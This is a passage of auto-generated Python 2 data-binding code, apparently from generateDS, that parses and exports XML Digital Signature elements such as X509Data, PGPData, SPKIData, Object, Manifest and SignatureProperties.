bval_ = self.gds_validate_base64(bval_, node, 'X509SKI')
else:
bval_ = None
self.X509SKI = bval_
elif nodeName_ == 'X509SubjectName':
X509SubjectName_ = child_.text
X509SubjectName_ = self.gds_validate_string(X509SubjectName_, node, 'X509SubjectName')
self.X509SubjectName = X509SubjectName_
elif nodeName_ == 'X509Certificate':
sval_ = child_.text
if sval_ is not None:
try:
bval_ = base64.b64decode(sval_)
except (TypeError, ValueError), exp:
raise_parse_error(child_, 'requires base64 encoded string: %s' % exp)
bval_ = self.gds_validate_base64(bval_, node, 'X509Certificate')
else:
bval_ = None
self.X509Certificate = bval_
elif nodeName_ == 'X509CRL':
sval_ = child_.text
if sval_ is not None:
try:
bval_ = base64.b64decode(sval_)
except (TypeError, ValueError), exp:
raise_parse_error(child_, 'requires base64 encoded string: %s' % exp)
bval_ = self.gds_validate_base64(bval_, node, 'X509CRL')
else:
bval_ = None
self.X509CRL = bval_
else:
obj_ = self.gds_build_any(child_, 'X509DataType')
if obj_ is not None:
self.set_anytypeobjs_(obj_)
# end class X509DataType
class X509IssuerSerialType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, X509IssuerName=None, X509SerialNumber=None):
self.X509IssuerName = X509IssuerName
self.X509SerialNumber = X509SerialNumber
def factory(*args_, **kwargs_):
if X509IssuerSerialType.subclass:
return X509IssuerSerialType.subclass(*args_, **kwargs_)
else:
return X509IssuerSerialType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_X509IssuerName(self): return self.X509IssuerName
def set_X509IssuerName(self, X509IssuerName): self.X509IssuerName = X509IssuerName
def get_X509SerialNumber(self): return self.X509SerialNumber
def set_X509SerialNumber(self, X509SerialNumber): self.X509SerialNumber = X509SerialNumber
def hasContent_(self):
if (
self.X509IssuerName is not None or
self.X509SerialNumber is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ds:', name_='X509IssuerSerialType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='X509IssuerSerialType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ds:', name_='X509IssuerSerialType'):
pass
def exportChildren(self, outfile, level, namespace_='ds:', name_='X509IssuerSerialType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.X509IssuerName is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sX509IssuerName>%s</%sX509IssuerName>%s' % (namespace_, self.gds_format_string(quote_xml(self.X509IssuerName).encode(ExternalEncoding), input_name='X509IssuerName'), namespace_, eol_))
if self.X509SerialNumber is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sX509SerialNumber>%s</%sX509SerialNumber>%s' % (namespace_, self.gds_format_integer(self.X509SerialNumber, input_name='X509SerialNumber'), namespace_, eol_))
def exportLiteral(self, outfile, level, name_='X509IssuerSerialType'):
level += 1
already_processed = set()
self.exportLiteralAttributes(outfile, level, already_processed, name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
if self.X509IssuerName is not None:
showIndent(outfile, level)
outfile.write('X509IssuerName=%s,\n' % quote_python(self.X509IssuerName).encode(ExternalEncoding))
if self.X509SerialNumber is not None:
showIndent(outfile, level)
outfile.write('X509SerialNumber=%d,\n' % self.X509SerialNumber)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'X509IssuerName':
X509IssuerName_ = child_.text
X509IssuerName_ = self.gds_validate_string(X509IssuerName_, node, 'X509IssuerName')
self.X509IssuerName = X509IssuerName_
elif nodeName_ == 'X509SerialNumber':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError), exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'X509SerialNumber')
self.X509SerialNumber = ival_
# end class X509IssuerSerialType
class PGPDataType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, PGPKeyID=None, PGPKeyPacket=None, anytypeobjs_=None):
self.PGPKeyID = PGPKeyID
self.PGPKeyPacket = PGPKeyPacket
if anytypeobjs_ is None:
self.anytypeobjs_ = []
else:
self.anytypeobjs_ = anytypeobjs_
self.PGPKeyPacket = PGPKeyPacket
if anytypeobjs_ is None:
self.anytypeobjs_ = []
else:
self.anytypeobjs_ = anytypeobjs_
def factory(*args_, **kwargs_):
if PGPDataType.subclass:
return PGPDataType.subclass(*args_, **kwargs_)
else:
return PGPDataType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_PGPKeyID(self): return self.PGPKeyID
def set_PGPKeyID(self, PGPKeyID): self.PGPKeyID = PGPKeyID
def get_PGPKeyPacket(self): return self.PGPKeyPacket
def set_PGPKeyPacket(self, PGPKeyPacket): self.PGPKeyPacket = PGPKeyPacket
def get_anytypeobjs_(self): return self.anytypeobjs_
def set_anytypeobjs_(self, anytypeobjs_): self.anytypeobjs_ = anytypeobjs_
def add_anytypeobjs_(self, value): self.anytypeobjs_.append(value)
def insert_anytypeobjs_(self, index, value): self._anytypeobjs_[index] = value
def get_PGPKeyPacket(self): return self.PGPKeyPacket
def set_PGPKeyPacket(self, PGPKeyPacket): self.PGPKeyPacket = PGPKeyPacket
def get_anytypeobjs_(self): return self.anytypeobjs_
def set_anytypeobjs_(self, anytypeobjs_): self.anytypeobjs_ = anytypeobjs_
def add_anytypeobjs_(self, value): self.anytypeobjs_.append(value)
def insert_anytypeobjs_(self, index, value): self._anytypeobjs_[index] = value
def hasContent_(self):
if (
self.PGPKeyID is not None or
self.PGPKeyPacket is not None or
self.anytypeobjs_ or
self.PGPKeyPacket is not None or
self.anytypeobjs_
):
return True
else:
return False
def export(self, outfile, level, namespace_='ds:', name_='PGPDataType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='PGPDataType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ds:', name_='PGPDataType'):
pass
def exportChildren(self, outfile, level, namespace_='ds:', name_='PGPDataType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.PGPKeyID is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sPGPKeyID>%s</%sPGPKeyID>%s' % (namespace_, self.gds_format_base64(self.PGPKeyID, input_name='PGPKeyID'), namespace_, eol_))
if self.PGPKeyPacket is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sPGPKeyPacket>%s</%sPGPKeyPacket>%s' % (namespace_, self.gds_format_base64(self.PGPKeyPacket, input_name='PGPKeyPacket'), namespace_, eol_))
if self.PGPKeyPacket is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sPGPKeyPacket>%s</%sPGPKeyPacket>%s' % (namespace_, self.gds_format_base64(self.PGPKeyPacket, input_name='PGPKeyPacket'), namespace_, eol_))
for obj_ in self.anytypeobjs_:
obj_.export(outfile, level, namespace_, pretty_print=pretty_print)
def exportLiteral(self, outfile, level, name_='PGPDataType'):
level += 1
already_processed = set()
self.exportLiteralAttributes(outfile, level, already_processed, name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
if self.PGPKeyID is not None:
showIndent(outfile, level)
outfile.write('PGPKeyID=model_.base64Binary(\n')
self.PGPKeyID.exportLiteral(outfile, level, name_='PGPKeyID')
showIndent(outfile, level)
outfile.write('),\n')
if self.PGPKeyPacket is not None:
showIndent(outfile, level)
outfile.write('PGPKeyPacket=model_.base64Binary(\n')
self.PGPKeyPacket.exportLiteral(outfile, level, name_='PGPKeyPacket')
showIndent(outfile, level)
outfile.write('),\n')
showIndent(outfile, level)
outfile.write('anytypeobjs_=[\n')
level += 1
for anytypeobjs_ in self.anytypeobjs_:
anytypeobjs_.exportLiteral(outfile, level)
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
if self.PGPKeyPacket is not None:
showIndent(outfile, level)
outfile.write('PGPKeyPacket=model_.base64Binary(\n')
self.PGPKeyPacket.exportLiteral(outfile, level, name_='PGPKeyPacket')
showIndent(outfile, level)
outfile.write('),\n')
showIndent(outfile, level)
outfile.write('anytypeobjs_=[\n')
level += 1
for anytypeobjs_ in self.anytypeobjs_:
anytypeobjs_.exportLiteral(outfile, level)
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'PGPKeyID':
sval_ = child_.text
if sval_ is not None:
try:
bval_ = base64.b64decode(sval_)
except (TypeError, ValueError), exp:
raise_parse_error(child_, 'requires base64 encoded string: %s' % exp)
bval_ = self.gds_validate_base64(bval_, node, 'PGPKeyID')
else:
bval_ = None
self.PGPKeyID = bval_
elif nodeName_ == 'PGPKeyPacket':
sval_ = child_.text
if sval_ is not None:
try:
bval_ = base64.b64decode(sval_)
except (TypeError, ValueError), exp:
raise_parse_error(child_, 'requires base64 encoded string: %s' % exp)
bval_ = self.gds_validate_base64(bval_, node, 'PGPKeyPacket')
else:
bval_ = None
self.PGPKeyPacket = bval_
elif nodeName_ == 'PGPKeyPacket':
sval_ = child_.text
if sval_ is not None:
try:
bval_ = base64.b64decode(sval_)
except (TypeError, ValueError), exp:
raise_parse_error(child_, 'requires base64 encoded string: %s' % exp)
bval_ = self.gds_validate_base64(bval_, node, 'PGPKeyPacket')
else:
bval_ = None
self.PGPKeyPacket = bval_
else:
obj_ = self.gds_build_any(child_, 'PGPDataType')
if obj_ is not None:
self.add_anytypeobjs_(obj_)
# end class PGPDataType
class SPKIDataType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, SPKISexp=None, anytypeobjs_=None):
self.SPKISexp = SPKISexp
self.anytypeobjs_ = anytypeobjs_
def factory(*args_, **kwargs_):
if SPKIDataType.subclass:
return SPKIDataType.subclass(*args_, **kwargs_)
else:
return SPKIDataType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_SPKISexp(self): return self.SPKISexp
def set_SPKISexp(self, SPKISexp): self.SPKISexp = SPKISexp
def get_anytypeobjs_(self): return self.anytypeobjs_
def set_anytypeobjs_(self, anytypeobjs_): self.anytypeobjs_ = anytypeobjs_
def hasContent_(self):
if (
self.SPKISexp is not None or
self.anytypeobjs_ is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ds:', name_='SPKIDataType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='SPKIDataType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ds:', name_='SPKIDataType'):
pass
def exportChildren(self, outfile, level, namespace_='ds:', name_='SPKIDataType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.SPKISexp is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sSPKISexp>%s</%sSPKISexp>%s' % (namespace_, self.gds_format_base64(self.SPKISexp, input_name='SPKISexp'), namespace_, eol_))
if self.anytypeobjs_ is not None:
self.anytypeobjs_.export(outfile, level, namespace_, pretty_print=pretty_print)
def exportLiteral(self, outfile, level, name_='SPKIDataType'):
level += 1
already_processed = set()
self.exportLiteralAttributes(outfile, level, already_processed, name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
if self.SPKISexp is not None:
showIndent(outfile, level)
outfile.write('SPKISexp=model_.base64Binary(\n')
self.SPKISexp.exportLiteral(outfile, level, name_='SPKISexp')
showIndent(outfile, level)
outfile.write('),\n')
if self.anytypeobjs_ is not None:
showIndent(outfile, level)
outfile.write('anytypeobjs_=model_.anytypeobjs_(\n')
self.anytypeobjs_.exportLiteral(outfile, level)
showIndent(outfile, level)
outfile.write('),\n')
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'SPKISexp':
sval_ = child_.text
if sval_ is not None:
try:
bval_ = base64.b64decode(sval_)
except (TypeError, ValueError), exp:
raise_parse_error(child_, 'requires base64 encoded string: %s' % exp)
bval_ = self.gds_validate_base64(bval_, node, 'SPKISexp')
else:
bval_ = None
self.SPKISexp = bval_
else:
obj_ = self.gds_build_any(child_, 'SPKIDataType')
if obj_ is not None:
self.set_anytypeobjs_(obj_)
# end class SPKIDataType
class ObjectType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, MimeType=None, Id=None, Encoding=None, anytypeobjs_=None, valueOf_=None, mixedclass_=None, content_=None):
self.MimeType = _cast(None, MimeType)
self.Id = _cast(None, Id)
self.Encoding = _cast(None, Encoding)
self.anytypeobjs_ = anytypeobjs_
self.valueOf_ = valueOf_
if mixedclass_ is None:
self.mixedclass_ = MixedContainer
else:
self.mixedclass_ = mixedclass_
if content_ is None:
self.content_ = []
else:
self.content_ = content_
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if ObjectType.subclass:
return ObjectType.subclass(*args_, **kwargs_)
else:
return ObjectType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_anytypeobjs_(self): return self.anytypeobjs_
def set_anytypeobjs_(self, anytypeobjs_): self.anytypeobjs_ = anytypeobjs_
def get_MimeType(self): return self.MimeType
def set_MimeType(self, MimeType): self.MimeType = MimeType
def get_Id(self): return self.Id
def set_Id(self, Id): self.Id = Id
def get_Encoding(self): return self.Encoding
def set_Encoding(self, Encoding): self.Encoding = Encoding
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.anytypeobjs_ is not None or
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='ds:', name_='ObjectType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='ObjectType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ds:', name_='ObjectType'):
if self.MimeType is not None and 'MimeType' not in already_processed:
already_processed.add('MimeType')
outfile.write(' MimeType=%s' % (self.gds_format_string(quote_attrib(self.MimeType).encode(ExternalEncoding), input_name='MimeType'), ))
if self.Id is not None and 'Id' not in already_processed:
already_processed.add('Id')
outfile.write(' Id=%s' % (self.gds_format_string(quote_attrib(self.Id).encode(ExternalEncoding), input_name='Id'), ))
if self.Encoding is not None and 'Encoding' not in already_processed:
already_processed.add('Encoding')
outfile.write(' Encoding=%s' % (self.gds_format_string(quote_attrib(self.Encoding).encode(ExternalEncoding), input_name='Encoding'), ))
def exportChildren(self, outfile, level, namespace_='ds:', name_='ObjectType', fromsubclass_=False, pretty_print=True):
if not fromsubclass_:
for item_ in self.content_:
item_.export(outfile, level, item_.name, namespace_, pretty_print=pretty_print)
def exportLiteral(self, outfile, level, name_='ObjectType'):
level += 1
already_processed = set()
self.exportLiteralAttributes(outfile, level, already_processed, name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
showIndent(outfile, level)
outfile.write('valueOf_ = """%s""",\n' % (self.valueOf_,))
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
if self.MimeType is not None and 'MimeType' not in already_processed:
already_processed.add('MimeType')
showIndent(outfile, level)
outfile.write('MimeType="%s",\n' % (self.MimeType,))
if self.Id is not None and 'Id' not in already_processed:
already_processed.add('Id')
showIndent(outfile, level)
outfile.write('Id="%s",\n' % (self.Id,))
if self.Encoding is not None and 'Encoding' not in already_processed:
already_processed.add('Encoding')
showIndent(outfile, level)
outfile.write('Encoding="%s",\n' % (self.Encoding,))
def exportLiteralChildren(self, outfile, level, name_):
showIndent(outfile, level)
outfile.write('content_ = [\n')
for item_ in self.content_:
item_.exportLiteral(outfile, level, name_)
showIndent(outfile, level)
outfile.write('],\n')
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
if node.text is not None:
obj_ = self.mixedclass_(MixedContainer.CategoryText,
MixedContainer.TypeNone, '', node.text)
self.content_.append(obj_)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('MimeType', node)
if value is not None and 'MimeType' not in already_processed:
already_processed.add('MimeType')
self.MimeType = value
value = find_attr_value_('Id', node)
if value is not None and 'Id' not in already_processed:
already_processed.add('Id')
self.Id = value
value = find_attr_value_('Encoding', node)
if value is not None and 'Encoding' not in already_processed:
already_processed.add('Encoding')
self.Encoding = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == '':
obj_ = __ANY__.factory()
obj_.build(child_)
obj_ = self.mixedclass_(MixedContainer.CategoryComplex,
MixedContainer.TypeNone, '', obj_)
self.content_.append(obj_)
if hasattr(self, 'add_'):
self.add_(obj_.value)
elif hasattr(self, 'set_'):
self.set_(obj_.value)
if not fromsubclass_ and child_.tail is not None:
obj_ = self.mixedclass_(MixedContainer.CategoryText,
MixedContainer.TypeNone, '', child_.tail)
self.content_.append(obj_)
# end class ObjectType
class ManifestType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, Id=None, Reference=None):
self.Id = _cast(None, Id)
if Reference is None:
self.Reference = []
else:
self.Reference = Reference
def factory(*args_, **kwargs_):
if ManifestType.subclass:
return ManifestType.subclass(*args_, **kwargs_)
else:
return ManifestType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_Reference(self): return self.Reference
def set_Reference(self, Reference): self.Reference = Reference
def add_Reference(self, value): self.Reference.append(value)
def insert_Reference(self, index, value): self.Reference[index] = value
def get_Id(self): return self.Id
def set_Id(self, Id): self.Id = Id
def hasContent_(self):
if (
self.Reference
):
return True
else:
return False
def export(self, outfile, level, namespace_='ds:', name_='ManifestType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='ManifestType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ds:', name_='ManifestType'):
if self.Id is not None and 'Id' not in already_processed:
already_processed.add('Id')
outfile.write(' Id=%s' % (self.gds_format_string(quote_attrib(self.Id).encode(ExternalEncoding), input_name='Id'), ))
def exportChildren(self, outfile, level, namespace_='ds:', name_='ManifestType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for Reference_ in self.Reference:
Reference_.export(outfile, level, namespace_, name_='Reference', pretty_print=pretty_print)
def exportLiteral(self, outfile, level, name_='ManifestType'):
level += 1
already_processed = set()
self.exportLiteralAttributes(outfile, level, already_processed, name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
if self.Id is not None and 'Id' not in already_processed:
already_processed.add('Id')
showIndent(outfile, level)
outfile.write('Id="%s",\n' % (self.Id,))
def exportLiteralChildren(self, outfile, level, name_):
showIndent(outfile, level)
outfile.write('Reference=[\n')
level += 1
for Reference_ in self.Reference:
showIndent(outfile, level)
outfile.write('model_.Reference(\n')
Reference_.exportLiteral(outfile, level)
showIndent(outfile, level)
outfile.write('),\n')
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Id', node)
if value is not None and 'Id' not in already_processed:
already_processed.add('Id')
self.Id = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Reference':
obj_ = ReferenceType.factory()
obj_.build(child_)
self.Reference.append(obj_)
# end class ManifestType
class SignaturePropertiesType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, Id=None, SignatureProperty=None):
self.Id = _cast(None, Id)
if SignatureProperty is None:
self.SignatureProperty = []
else:
self.SignatureProperty = SignatureProperty
def factory(*args_, **kwargs_):
if SignaturePropertiesType.subclass:
return SignaturePropertiesType.subclass(*args_, **kwargs_)
else:
return SignaturePropertiesType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_SignatureProperty(self): return self.SignatureProperty
def set_SignatureProperty(self, SignatureProperty): self.SignatureProperty = SignatureProperty
def add_SignatureProperty(self, value): self.SignatureProperty.append(value)
def insert_SignatureProperty(self, index, value): self.SignatureProperty[index] = value
def get_Id(self): return self.Id
def set_Id(self, Id): self.Id = Id
def hasContent_(self):
if (
self.SignatureProperty
):
return True
else:
return False
def export(self, outfile, level, namespace_='ds:', name_='SignaturePropertiesType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='SignaturePropertiesType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ds:', name_='SignaturePropertiesType'):
if self.Id is not None and 'Id' not in already_processed:
already_processed.add('Id')
outfile.write(' Id=%s' % (self.gds_format_string(quote_attrib(self.Id).encode(ExternalEncoding), input_name='Id'), ))
def exportChildren(self, outfile, level, namespace_='ds:', name_='SignaturePropertiesType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for SignatureProperty_ in self.SignatureProperty:
SignatureProperty_.export(outfile, level, namespace_, name_='SignatureProperty', pretty_print=pretty_print)
def exportLiteral(self, outfile, level, name_='SignaturePropertiesType'):
level += 1
already_processed = set()
self.exportLiteralAttributes(outfile, level, already_processed, name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
if self.Id is not None and 'Id' not in already_processed:
already_processed.add('Id')
showIndent(outfile, level)
outfile.write('Id="%s",\n' % (self.Id,))
def exportLiteralChildren(self, outfile, level, name_):
showIndent(outfile, level)
outfile.write('SignatureProperty=[\n')
level += 1
for SignatureProperty_ in self.SignatureProperty:
showIndent(outfile, level)
outfile.write('model_.SignatureProperty(\n')
SignatureProperty_.exportLiteral(outfile, level)
showIndent(outfile, level)
outfile.write('),\n')
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Id', node)
if value is not None and 'Id' not in already_processed:
already_processed.add('Id')
self.Id = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'SignatureProperty':
obj_ = SignaturePropertyType.factory()
obj_.build(child_)
self.SignatureProperty.append(obj_)
# end class SignaturePropertiesType
class SignaturePropertyType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, Target=None, Id=None, anytypeobjs_=None, valueOf_=None, mixedclass_=None, content_=None):
self.Target = _cast(None, Target)
self.Id = _cast(None, Id)
self.anytypeobjs_ = anytypeobjs_
self.valueOf_ = valueOf_
if mixedclass_ is None:
self.mixedclass_ = MixedContainer
else:
self.mixedclass_ = mixedclass_
if content_ is None:
self.content_ = []
else:
self.content_ = content_
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if SignaturePropertyType.subclass:
return SignaturePropertyType.subclass(*args_, **kwargs_)
else:
return SignaturePropertyType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_anytypeobjs_(self): return self.anytypeobjs_
def set_anytypeobjs_(self, anytypeobjs_): self.anytypeobjs_ = anytypeobjs_
def get_Target(self): return self.Target
def set_Target(self, Target): self.Target = Target
def get_Id(self): return self.Id
def set_Id(self, Id): self.Id = Id
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.anytypeobjs_ is not None or
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='ds:', name_='SignaturePropertyType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='SignaturePropertyType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ds:', name_='SignaturePropertyType'):
if self.Target is not None and 'Target' not in already_processed:
already_processed.add('Target')
outfile.write(' Target=%s' % (self.gds_format_string(quote_attrib(self.Target).encode(ExternalEncoding), input_name='Target'), ))
if self.Id is not None and 'Id' not in already_processed:
already_processed.add('Id')
outfile.write(' Id=%s' % (self.gds_format_string(quote_attrib(self.Id).encode(ExternalEncoding), input_name='Id'), ))
def exportChildren(self, outfile, level, namespace_='ds:', name_='SignaturePropertyType', fromsubclass_=False, pretty_print=True):
if not fromsubclass_:
for item_ in self.content_:
item_.export(outfile, level, item_.name, namespace_, pretty_print=pretty_print)
def exportLiteral(self, outfile, level, name_='SignaturePropertyType'):
level += 1
already_processed = set()
self.exportLiteralAttributes(outfile, level, already_processed, name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
showIndent(outfile, level)
outfile.write('valueOf_ = """%s""",\n' % (self.valueOf_,))
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
if self.Target is not None and 'Target' not in already_processed:
already_processed.add('Target')
showIndent(outfile, level)
outfile.write('Target="%s",\n' % (self.Target,))
if self.Id is not None and 'Id' not in already_processed:
already_processed.add('Id')
showIndent(outfile, level)
outfile.write('Id="%s",\n' % (self.Id,))
def exportLiteralChildren(self, outfile, level, name_):
showIndent(outfile, level)
outfile.write('content_ = [\n')
for item_ in self.content_:
item_.exportLiteral(outfile, level, name_)
showIndent(outfile, level)
outfile.write('],\n')
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
if node.text is not None:
obj_ = self.mixedclass_(MixedContainer.CategoryText,
MixedContainer.TypeNone, '', node.text)
self.content_.append(obj_)
for child in node:
